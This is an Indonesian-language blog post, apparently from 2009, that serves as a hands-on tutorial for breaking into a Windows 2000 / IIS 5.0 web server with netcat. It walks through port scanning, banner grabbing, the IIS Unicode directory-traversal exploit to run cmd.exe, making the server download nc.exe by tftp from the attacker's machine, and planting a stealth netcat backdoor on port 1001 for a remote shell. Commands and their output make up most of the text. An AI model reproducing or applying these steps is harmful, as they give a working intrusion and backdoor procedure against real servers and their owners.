NeTcaT

Posted by Source Computer on Friday, November 27, 2009





Nyusup ke Web Server Dengan NeTcaT



Netcat sering disebut ; "TCP/IP Swiss army Knife" para hacker
karena kemampuannya yg mampu melakukan banyak hal dengan hanya
menggunakan 1 tool ini.

yang dapat dilakukan dengan netcat antara lain:

- Scanning port dan menginventori service2 yang terpasang
pada server.

- File transfer.

- Pengujian dan simulasi terhadap server

- Menguji Firewall, proxy dan gateway

- Menguji performance Network

- Pengujian Address Spoffing

- Banner Grabbing.

- DLL.

Skenario Melakukan Penyusupan Ke Web Server

Download Netcat.zip

kemudian extract netcat.zip kedalam sebuah direktori.
masuk ke command prompt, kemudian masuk ke direktori dimana anda mengextrac file netcat.zip yang tadi didownload.

Dalam skenario ini kita akan menyusup ke sebuah server web yg menggunakan sistem
operasi Windows 2000 dengan IIS 5.0
untuk sistem operasi lain diperlukan pengetahuan mengenai sistem target
untuk memanfaatkan bug yg ada.

Ok langsung ja, kita cari server web yang menggunakan Microsoft Windows 2000 dengan IIS versi 5.0, ketikkan command berikut :

C:\TMP\NETCAT> nc -v -z ristbook 20-80

ristbook [128.1.71.103] 80 (http) open
ristbook [128.1.71.103] 25 (smtp) open
ristbook [128.1.71.103] 21 (ftp) open

C:\TMP\NETCAT>_

Terlihat server ristbook membuka port 80.
kemudian kita cari tau apakah server ristbook menggunakan Microsoft dan IIS 4.0/5.0?
caranya ketikan command berikut :

C:\TMP\NETCAT> nc -v ristbook 80

ristbook [128.1.71.103] 80 (http) open
get http
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Sat, 11 Oct 2003 08:51:34 GMT
Content-Type: text/html
Content-Length: 87
ErrorThe parameter is incorrect.

C:\TMP\NETCAT>_

Ternyata server tersebut merupakan server web yang menggunakan Microsoft dengan IIS
5.0. Selanjutnya kita cari tau apakah server web ini sudah memasang patch dan terhindar
dari bugs unicode ata tidak. ketikkan command sprt dibawah :

C:\TMP\NETCAT> nc -v ristbook 80

ristbook [128.1.71.103] 80 (http) open
get http://ristbook/scripts/..%255c../winnt/system32/cmd.exe?/c+dir+c:\
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sat, 11 Oct 2003 09:06:52 GMT
Content-Type: application/octet-stream
Volume in drive C has no label.
Volume Serial Number is 0C42-12EA
Directory of c:\
09/17/2001 11:46a 1,012 FRUNLOG.TXT
09/17/2001 11:35a

C:\TMP\NETCAT>_

Ternyata server belum dipasangi patch untuk bugs unicode.
Sekarang kita dapat menyusupkan netcat ke dalam server web tersebut agar kita dapat mengendalikan server tersebut.
Cara untuk menyusupkan netcat ke dalam ke dalam server web dapat menggunakan service tftp (Trivial File Transfer Protocol). Dengan service ini kita dapat memerintahkan server web target untuk mengupload netcat dari tftp server yang terpasang di komputer Anda.
Untuk itu kita harus mengaktifkan atau menginstall tftp server pada komputer kita, jika
belum tersedia. Jika komputer Anda menggunakan sistem operasi Windows, Anda dapat
menginstall aplikasi freeware tftpd32 buatan Philippe Jounin yang dapat didownload dari http://membres.lycos.fr/phjounin/ atau dari situs-sistus hacker lainnya.
Selanjutnya aktifkan tftp server, lihat gambar dibawah :

Kemudian masukkan program Netcat yang akan diupload ke server web target ke dalam
direktori tftp dari komputer Anda yang telah diinstall tftp. Atau Anda dapat mengarahkan base
directory dari tftp ke direktori program Netcat Anda.

Sampai disini Anda telah menyiapkan tftp di komputer Anda yang di dalam base
directorinya berisi Netcat. Untuk mengupload Netcat ke server tujuan menggunakan instruksi Netcat,
sebagai berikut:

C:\TMP\NETCAT> nc -v ristbook 80

ristbook [128.1.71.103] 80 (http) open
get http://ristbook/scripts/..%255c../winnt/system32/cmd.exe?/c+tftp+-i+128.1.99.25+get+nc.exe
HTTP/1.1 502 Gateway Error
Server: Microsoft-IIS/5.0
Date: Sun, 26 Oct 2003 11:00:54 GMT
Content-Length: 215
Content-Type: text/html
Error in CGI Application

CGI Error

The specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

   
   
C:\TMP\NETCAT>_
 
 
Langkah di atas adalah memerintahkan server web untuk mengupload nc.exe menggunakan

perintah tftp –i 128.1.99.25. IP 128.1.99.25 merupakan komputer Anda yang telah terpasang tftp server.

Jika menggunakan tftpd32, maka di layar tftp akan terlihat pesan transfer sukses seperti gambar dibawah :

Selanjutnya kita akan membuat Backdor pada server web tersebut, agar nantinya dapat masuk dan keluar melalaui jalan pintas

tanpa harus melalui jalur yang semestinya. Untukmengaktifkan perintah Netcat yang telah diupload pada server web di atas ketikkan command berikut ::
 
   
C:\NETCAT> nc –L –p 1001 –d –e cmd.exe

C:\NETCAT>_
 
 
Opsi –L adalah mode listening, opsi –p menujukkan koneksi dilakukan via port 1001 dapat juga menggunakan port lainnya jika diperlukan untuk mengecoh firewall. Opsi lain yang sangat dahsyat adalah –d, agar telnet dijalankan dengan mode tersembunyi atau stealth. Opsi terakhir –e akan mengeksekusi perintah command.exe untuk dipergunakan oleh koneksi yang masuk.

Ok langsung saja ketikkan command berikut :
 
   
 C:\TMP\NETCAT> nc -v ristbook 80
   
     
ristbook [128.1.71.103] 80 (http) open

get http://ristbook/scripts/..%255c../winnt/system32/cmd.exe?/c+nc+-L+-p+1001+-d+-e+cmd.exe
   
 
 
Netcat akan listening pada port 1001. Selanjutnya anda dapat mengakses backdoor dari

komputer Anda sebagai berikut:
 
   
C:\TMP\NETCAT> ipconfig (command menunjukkan nomor IP pada komputer Anda)
   
     
Windows IP Configuration

Ethernet adapter Local Area Connection:

Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 128.1.99.25

Subnet Mask . . . . . . . . . . . : 255.255.0.0

Default Gateway . . . . . . . . . : 128.1.99.25
   
   
C:\TMP\NETCAT> nc -v ristbook 1001

ristbook [128.1.71.103] 1001 (?) open

Microsoft Windows 2000 [Version 5.00.2195]

(C) Copyright 1985-1999 Microsoft Corp.
   
d:\inetpub\scripts> ipconfig (command menunjukkan nomor IP komputer saat ini)
   
ipconfig
   
Windows 2000 IP Configuration
   
Ethernet adapter Local Area Connection 3:
   
     
Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 169.254.1.1

Subnet Mask . . . . . . . . . . . : 255.255.0.0

Default Gateway . . . . . . . . . :
   
   
Ethernet adapter Local Area Connection:
   
     
Connection-specific DNS Suffix . :

IP Address. . . . . . . . . . . . : 128.1.71.103

Subnet Mask . . . . . . . . . . . : 255.255.0.0

Default Gateway . . . . . . . . . :
   
   
d:\inetpub\scripts> dir
 
 
Perhatikan pada saat perintah ipconfig yang pertama, menunjukkan nomor IP komputer Anda, yaitu 128.1.99.25. Setelah dilakukan perintah nc –v ristbook 1001, Anda masuk ke server web target. Perintah ipconfig memperlihatkan anda berada di dalam server web, yaitu IP 128.1.71.103 dan 169.254.1.1 yang ternyata memiliki 2 IP address.
 
Cara yang sama dengan di atas adalah mengunakan telnet dengan port 1001 sebagai berikut:
 
   
C:\> telnet ristbook 1001
   
Microsoft(R) Windows 98

(C)Copyright Microsoft Corp 1981-1999.
   
C:\NETCAT> dir
   
 
Tutorial ini gw tulis sebagai bahan pembelajaran, selanjutnya terserah anda. Untuk mengetahui fitur2 dan fungsi2 yang lebih dalam lg tentang netcat anda dapat mendownload e-booknya disini. 
 




























0
comments:
        












Post a Comment